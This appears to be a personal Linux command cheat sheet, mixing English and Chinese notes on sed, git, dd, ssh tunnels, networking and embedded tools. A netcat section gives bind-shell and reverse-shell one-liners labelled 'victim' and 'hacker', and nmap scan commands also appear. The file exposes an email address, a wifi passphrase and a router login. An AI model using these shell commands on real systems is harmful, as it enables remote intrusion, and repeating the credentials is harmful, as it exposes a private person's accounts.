#set LS_COLORS
export LS_COLORS="no=00:fi=00:di=01;34:ln=00;04;31:pi=00;37:so=01;31:bd=37:cd=37:or=01;31:ex=01;31:*.o=01:*.gz=00;35:*.tar=00;35:*.Z=00;35:*.tgz=00;35:*.mpg=36:*.mpeg=36:*.dat=35:*.mov=35:*.pm=35:*.jpg=36:*.JPG=36:*.gif=36:*.GIF=36:*.ps=01;33:*.pdf=01;35:*.fm=01;35:*.htm=01;34:*.html=01;34:*.HTM=01;34:*.HTML=01;34:*.c=00;31:*.cpp=00;31:*.pl=00;31:*.my=01;04;35:*.man=01;04;07;30:*.ppt=35:*.DOC=35:*.doc=35:*.cmd=04;35:*.tcl=04;36:*.tclscript=04;36:*.log=04;35"

#替换目录下所有文件中的的匹配字符串
find ./driver/ ./system/ ./include/ ./test/ | grep ".*\.[ch]$" | xargs sed -i 's/uart_printf/PRINT_EMG/g'

#delete space at the end of line
sed -i 's/[ ]*$//g'

#modify line 1234
sed -i '1234creplacedtext' file

#delete last line
sed -i '$d' file

# count .c .h lines
find . | egrep ".*\.c$|.*\.h$" | xargs wc -l

#sed删除行尾空格
sed -i 's/[ \t]*$//g' file

#sed 文件顶部增加一行
sed -i '1s/^/abcdefg\n/' file

# change the whole match  line
sed -i '/this/cthat' file

#递归搜索，替换
find . -type f -name '*.txt' -exec sed -i 's/this/that/g' {} +

#delete comment txt
cat xxx.gcode | grep -v "^;" | sed 's/;.*//g' 

#git
git config --global user.name "wuxx"
git config --global user.email "wujianhua0924@gmail.com"

git config --global alias.st status
git config --global alias.ci commit
git config --global alias.co checkout
git config --global alias.br branch  
git config --global alias.lg "log --color --graph --pretty=format:'%Cred%h%Creset -%C(yellow)%d%Creset %s %Cgreen (%cr) %C(bold blue)<%an>%Creset' --abbrev-commit --"  
git config --global color.ui true 
git config --global core.editor vim

git stash save -u

git bisect start
git bisect good
git bisect bad <SHA-1>
then...
git bisect good or git bisect bad

#mov to one commit id temporary
git checkout <SHA-1>
#mov back to master
git checkout master

git branch --set-upstream-to=origin/master master

#and work on the same branch with others and somebody already upload some commit and if you want to commit 
git pull --rebase

#multi github account in one PC. ssh
http://jingyan.baidu.com/article/948f592414ad67d80ef5f966.html

#sparse checkout
https://www.cnblogs.com/liangzai-cool/p/5821138.html

#delete the untracked file
git clean -fd  
git clean -nfd   #like make -n, just show what will be done, not actually do.

#get git last tag
git describe --tags `git rev-list --tags --max-count=1`  
git tag -a x.x.x -m "msg"
git push origin --tags

git fsck --full

git log --name-status

#gcc predefined macro
gcc -dM -E - < /dev/null

#dump optimizers
gcc -Q --help=optimizers -O1

#python 2.7 simple http server
python -m SimpleHTTPServer 8080
#python 3 simple http server
python -m http.server 8080

#make raspberry pi image
sudo dd if=./2015-05-05-raspbian-wheezy.img of=/dev/sdb bs=2M

#get 8K random data
dd if=/dev/urandom of=data.bin bs=8K count=1

#dd with nc
http://www.cnblogs.com/kumulinux/archive/2012/06/13/2808748.html

#get the internet address on my router
curl -u admin:admin http://192.168.1.1/userRpm/StatusRpm.htm | grep -A1 "6C-E8-73-6F-A6-D5" | tail -n 1 | sed 's/,//'

#edit the hex file
#hex view
%!xxd

#save
%!xxd -r

#set the timezone on debian linux system
dpkg-reconfigure tzdata

#starting with the Kth of each file (count start from 1)
tail -c +K file

#putty serial
putty -serial COM7 -sercfg 115200,8,n,1,X

#xargs
ls mifare/javacard/*.cap | xargs -I '{}' ./readcap {} > 1.log

#ssh tunnel
on local machine
ssh -N -f -o TCPKeepAlive=yes -R 2222:127.0.0.1:22  root@internet_ip

on internet machine
ssh pi@127.0.0.1 -p 2222

#delete file accord the inum
find ./ -inum 919102 -exec rm -rfi {} \;
find ./ -inum 919102 -exec rm {} \;

#search head file
apt-file search xxx.h

#screen
[C-a] D to detach
screen -ls
screen -r id

#nc shell
#the victim listen
nc.exe -l -p 8000 -t -e cmd.exe
#the hacker get the shell
nc xxx.xxx.xxx.xxx 8000

#nc reverse shell
#the hacker wait
nc -vv -l -p 8000
#the victim  connect
nc.exe -t -e cmd.exe xxx.xxx.xxx.xxx 8000

#nc file trans
nc -l -p  8000 > test.txt
nc dst_ip 8000 < test.txt    

#add swap space
cd /var
# 先关闭
sudo swapoff /var/swap
# 重新设置大小1M * 1024 = 1G
sudo dd if=/dev/zero of=swap bs=1M count=1024
# 格式化
sudo mkswap /var/swap
#开启
sudo swapon /var/swap
# 查看当前已生效的swap
swapon -s
# 查看当前swap使用情况
free -m


#make ramdisk
$sudo mke2fs /dev/ram0 /^C
$sudo mkdir /mnt/ramdisk0
$sudo mount /dev/ram0 /mnt/ramdisk0/

#mount ram-base fs
$mount tmpfs /mnt/tmp -t tmpfs -o size=512M

#show symbol debug info
LD_DEBUG=symbols ./xxx.elf

tmux 
detach the session
ctrl+b d
tmux a -t session-name
#cheetsheet
http://blog.csdn.net/hcx25909/article/details/7602935

ln -sf target link-name

#ubuntu16.04 turn off gui interface
http://blog.51cto.com/verdureorange/1771036
#turn off
systemctl disable lightdm.service
#turn on
sudo ln -s /lib/systemd/system/lightdm.service /etc/systemd/system/display-manager.service

#change user name
http://www.jianshu.com/p/11cd3564855c

#openwrt compile
git clone https://www.github.com/openwrt/openwrt -b chaos_calmer
./scripts/feeds update -a
./scripts/feeds install -a
make menuconfig

#lede compile
git clone -b lede-17.01 https://git.lede-project.org/source.git
./scripts/feeds update -a
./scripts/feeds install -a
make menuconfig

#sudo save in vim
w !sudo tee %

#solve locale problem: perl: warning: Setting locale failed.
sudo dpkg-reconfigure locales #choose the en_US.UTF-8

#locale
export LANG=en_US
export LANGUAGE=en_US.UTF-8
export LC_ALL=en_US.UTF-8

sudo dpkg-reconfigure dash

#shell tricks
#exit when use uninit var
set -o nounset
#exit when cmd return non-zero value
set -o errexit

#minicom usage
minicom -D /dev/ttyUSB0 -b 115200
#howto exit
#ctrl-A X

#wifi connect
wpa_supplicant -B -c /etc/wpa_supplicant/wpa_supplicant.conf -iwlan0
network={
    ssid="PandoraBox_0D0D47"
    psk="wujianhua"
}

#i2c tools
i2cdetect -r -y 0
0  1  2  3  4  5  6  7  8  9  a  b  c  d  e  f
00:          -- -- -- -- -- -- -- -- -- -- -- -- --
10: -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
20: -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
30: -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
40: -- -- -- -- -- -- -- -- UU -- -- -- -- -- -- --
50: -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
60: -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
70: -- -- -- -- -- -- -- --

#dd seek skip
dd if=ifile of=ofile bs=1 seek=10 #[seek OFILE] modify from offset 10 byte of ofile
dd if=ifile of=ofile bs=1 skip=10 #[skip IFILE] skip 10 bytes of ifile

dd if=ifile of=ofile bs=1 skip=10 count=1024
dd if=zImage of=part1_kernel.new.bin bs=1 conv=notrunc count=2355248

dd if=A of=B bs=200 conv=sync

#get file size
stat -c %s file

#china ntp server
http://www.ntp.org.cn/
ntpdate cn.ntp.org.cn

#calc
A=32
B=$(($A + 2))

dtc -I dtb -O dts waveshare32b-overlay.dtb > waveshare32b-overlay.dts
dtc -I dts -O dtb -o waveshare32b.dtbo.new waveshare32b.dts

#nmap
nmap -sP 192.168.0.1-254
nmap -O 192.168.0.16
nmap -A -T4 192.168.1.1-254
sudo nmap -sT 192.168.1.0/24

#fping
fping -g 192.168.0.0 192.168.0.254

#port map, visit the ipternet_ip:1234
ssh -N -f -R 1234:127.0.0.1:8020 root@internet_ip

#count the file num opened by process
lsof -n|awk '{print $2}'|sort|uniq -c|sort -nr | grep 415

lsof -n|awk '{print $2}'| grep 415 | wc -l

#raspberry pi set wallpaper
pcmanfm --set-wallpaper /home/pi/Dashboard.png --wallpaper-mode=fit

#samba
[home]
   public = yes
   browseable = yes
   path = /home/
   guest ok = no
   create mask = 0755
   writable = yes
smbpasswd -a user-name

#extundelete
https://www.cnblogs.com/yuhuLin/p/7027253.html

#find
find . -newermt `date +%F` | sort

#date
date -d '1 days ago' +%F

#convert
https://superuser.com/questions/294270/how-to-view-raw-binary-data-as-an-image-with-given-width-and-height

printf '\xFF\x00\x00\x00\xFF\x00\x00\x00\xFF' > f
convert -depth 8 -size 3x1+0 rgb:f out.png

printf '\x00\xFF\x88\xFF\x00\xFF' > f
convert -depth 8 -size 3x2+0 gray:f out.png

#convert resize
convert -resize 600x600! src.jpg dst.jpg
#convert to 1-byte grayscale
convert source.jpg -monochrome destination.jpg

#gitlab zh
sudo cp -r /opt/gitlab/embedded/service/gitlab-rails{,.ori}
sudo cp -rf gitlab-10-8-stable-zh/* /opt/gitlab/embedded/service/gitlab-rails/
sudo gitlab-ctl reconfigure
sudo gitlab-ctl restart

#remote command
ssh xxx@xx.xx.xx.xx "ls"

#connect wifi
wpa_supplicant -B -c/etc/wpa_supplicant/wpa_supplicant.conf -iwlan1
dhclient wlan1

#get ip
ifconfig wlan0 | grep "inet " | awk '{ print $2}'

#dd progress
sudo dd if=/dev/mmcblk0 of=/dev/sda status=progress

#statvfs
https://blog.csdn.net/papiping/article/details/6980573

#bash while
while [ 1 ]; do sleep 1; free; done

#toilet
toilet -f standard -F metal abc

#rpi3b fsck
https://raspberrypi.stackexchange.com/questions/61723/raspberry-pi-3-and-raspbian-jessie-how-to-run-fsck-at-boot
https://www.raspberrypi.org/forums/viewtopic.php?p=459652

git submodule add git@github.com:xxx/deploy.git deploy
git submodule init
git submodule update
https://www.jianshu.com/p/f8a55b972972

git clone /path/to/repos/foo.git
git submodule init
git submodule update

git pull --recurse-submodules

git pull -p

git clone --recursive /path/to/repos/foo.git


#git delete commit history
1.Checkout

   git checkout --orphan latest_branch

2. Add all the files

   git add -A

3. Commit the changes

   git commit -am "commit message"


4. Delete the branch

   git branch -D master

5.Rename the current branch to master

   git branch -m master

6.Finally, force update your repository

   git push -f origin master

#fill the framebuffer
cat /dev/urandom >/dev/fb0


#convert rgba to rgb
https://stackoverflow.com/questions/34305379/how-to-convert-gray-scale-png-image-to-rgb-from-comand-line-using-image-magick
convert in.png -define png:color-type=2 out.png
convert -rotate 270 in.png out.png

convert -define png:color-type=2 -rotate 270 in.png out.png

#install convert
sudo apt-get install imagemagick


#adjust swap 
cat /proc/sys/vm/swappiness
sysctl vm.swappiness=10
or 
echo 'vm.swappiness=10' >> /etc/sysctl.conf

#nmcli
nmcli dev dis wlan0
https://blog.csdn.net/hrl7752/article/details/78549907

#gdb dump stm32 flash memory
$telnet localhost 4444
halt

$gdb
target remote localhost:3333
dump binary memory flash_128k.bin 0x08000000 0x08020000 #128K

#zip
zip -q -r html.zip *

#flashrom detect
flashrom -p linux_spi:dev=/dev/spidev0.0,spispeed=1000
#flashrom read
flashrom -p linux_spi:dev=/dev/spidev0.0 -r flash_image.bin
#flashrom write
flashrom -p linux_spi:dev=/dev/spidev0.0 -VVV -w flash_image.bin
